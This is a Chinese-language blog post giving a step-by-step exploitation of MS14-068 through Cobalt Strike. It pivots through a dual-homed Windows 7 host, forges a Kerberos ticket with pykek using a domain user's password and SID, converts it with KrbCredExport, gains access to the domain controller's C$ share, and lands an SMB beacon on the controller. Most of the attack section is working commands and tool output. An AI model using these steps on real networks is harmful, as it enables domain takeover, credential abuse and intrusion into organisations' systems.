通过 Cobalt Strike 利用 ms14-068
2024-10-11 01:19:36
拓扑图
攻击者(kali
) 位于 192.168.245.0/24
网段,域环境位于 192.168.31.0/24
网段。
域中有一台 win7
有两张网卡,可以同时访问两个网段,以这台机器作为跳板机进入域环境。
假设现在已经有一组域用户的账号密码
user1 321!@#qwe
获取用户的 sid
whoami /user
下面使用 pykek
生成票据,首先用 cs
开一个 socks
代理,然后用 proxychains
把 pykek
带入内网
proxychains python ms14-068.py -u user1@demo.ad -s S-1-5-21-2864277510-2444243591-773573486-1112 -d 192.168.1.100 -p '321!@#qwe'
其中
demo.ad
为 域名user1
为域中的一个用户321!@#qwe
为user1
的密码user1
的sid
为S-1-5-21-2864277510-2444243591-773573486-1112
192.168.1.100
为域控的 IP
执行完毕后会在当前目录下生成一个 .ccache
的文件
# proxychains python ms14-068.py -u user1@demo.ad -s S-1-5-21-2864277510-2444243591-773573486-1112 -d 192.168.1.100 -p '321!@#qwe'
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Building AS-REQ for 192.168.1.100... Done!
[+] Sending AS-REQ to 192.168.1.100...|S-chain|-<>-127.0.0.1:13491-<><>-192.168.1.100:88-<><>-OK
Done!
[+] Receiving AS-REP from 192.168.1.100... Done!
[+] Parsing AS-REP from 192.168.1.100... Done!
[+] Building TGS-REQ for 192.168.1.100... Done!
[+] Sending TGS-REQ to 192.168.1.100...|S-chain|-<>-127.0.0.1:13491-<><>-192.168.1.100:88-<><>-OK
Done!
[+] Receiving TGS-REP from 192.168.1.100... Done!
[+] Parsing TGS-REP from 192.168.1.100... Done!
[+] Creating ccache file 'TGT_user1@demo.ad.ccache'... Done!
然后使用 KrbCredExport 转 .ccache
为 kirbi
格式。
# python KrbCredExport/KrbCredExport.py TGT_user1@demo.ad.ccache user1.ticket
CCache File Found, Converting to kirbi
转换后的文件保存在 user1.ticket
, 然后可以用 cs
加载这个文件。
下面先看看没有加载前的权限。
首先获取域控的机器名。
shell net group "domain controllers" /domain
所以 域控的主机名为
WIN-OA43324ZI95.demo.ad
然后 net use
一下 ,发现是不能访问的。
net use \\WIN-OA43324ZI95.demo.ad\c$
然后加载 user1.ticket
文件, 再次执行发现可以访问域控资源,已经得到域控的权限。
注: 一定要用 域控的主机全名 而不要用 ip 。
然后使用当前对话对域控进行 psh
攻击 ,使用 smb
的 beacon
过一会就可以看到域控连上来了。
参考
https://blog.cptjesus.com/posts/ms14068
https://zhuanlan.zhihu.com/p/26171460
内网渗透中mimikatz的使用(https://www.jianshu.com/p/a3ddd7502c09)
最新文章
- Linux定时任务设定
- 开发常用到的terminal命令
- PHP学习笔记:APACHE配置虚拟目录、一个站点使用多域名配置方式
- 【Todo】Python面试题分析记录(修饰器等)
- go循环
- 在用的vim插件
- diamond专题(三)—— diamond架构
- C++程序设计实践指导1.7超长数列中n个数排序改写要求实现
- Json安全
- window.setInterval与window.setTimeout使用实例
- Effective Java 第三版——12. 始终重写 toString 方法
- c++常用
- [NIO-4]选择器
- EasyUI Tree节点拖动到指定容器
- GsonUtil工具类
- 判断数组对象里面的某个属性全部为true才执行下一步操作
- linux学习笔记-目录结构(1)
- javascript 作用域、作用域链理解
- Node.js- sublime搭建node的编译环境
- Dataframe 新增一列, apply 通用方法
热门文章
- Linux inode空间占满 “no space left on device”
- 德哥PostgreSQL学习资料汇总(转)
- Redis笔记(3)多数据库实现
- vuejs之Vue Devtools
- Error:fatal: Not a git repository (or any of the parent directories): .git
- 探讨e.target与e.currentTarget
- Django model转字典的几种方法
- Vue笔记:使用 VS Code 断点调试
- TensorFlow object detection API应用--配置
- Android so文件进阶 <;一>;